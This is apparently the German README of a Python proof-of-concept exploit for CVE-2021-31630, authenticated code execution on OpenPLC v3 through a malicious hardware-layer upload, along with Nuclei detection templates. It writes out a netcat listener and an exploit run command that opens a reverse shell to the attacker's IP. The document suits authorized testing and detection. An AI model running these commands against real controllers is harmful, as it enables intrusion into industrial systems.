
Python 3.13+ Proof-of-Concept-Exploit für CVE-2021-31630, das eine authentifizierte Remote-Codeausführung auf OpenPLC v3 durch schädlichen Hardware-Layer-Upload ermöglicht. Enthält Nuclei-Erkennungsvorlagen für Standard-Anmeldedaten und Schwachstellenprüfungen.
Dies ist ein moderner, mit Python 3.13+ kompatibler Proof-of-Concept-Exploit für CVE-2021-31630, eine Schwachstelle in OpenPLC v3, die es einem authentifizierten Benutzer ermöglicht, eine benutzerdefinierte Hardware-Schicht mit bösartigem Code hochzuladen, was zu einer Remote-Codeausführung (RCE) auf dem Host führt.
Ursprüngliche Schwachstellenentdeckung und -beratung durch Fellipe Oliveira. Diese Neuimplementierung und Modernisierung verwendet httpx, CLI-Tooling, Logging und sicherere Erkennungstechniken.
nc -lvnp 9001
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001
Optionale Flags:
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080
Die zweite Vorlage meldet sich an und versucht einen harmlosen Payload-Upload + Kompilierung, um eine wahrscheinliche Schwachstelle zu bestätigen – ohne eine tatsächliche Codeausführung auszulösen.
Dieser Code dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken. Nicht ohne ausdrückliche Genehmigung des Systembesitzers verwenden.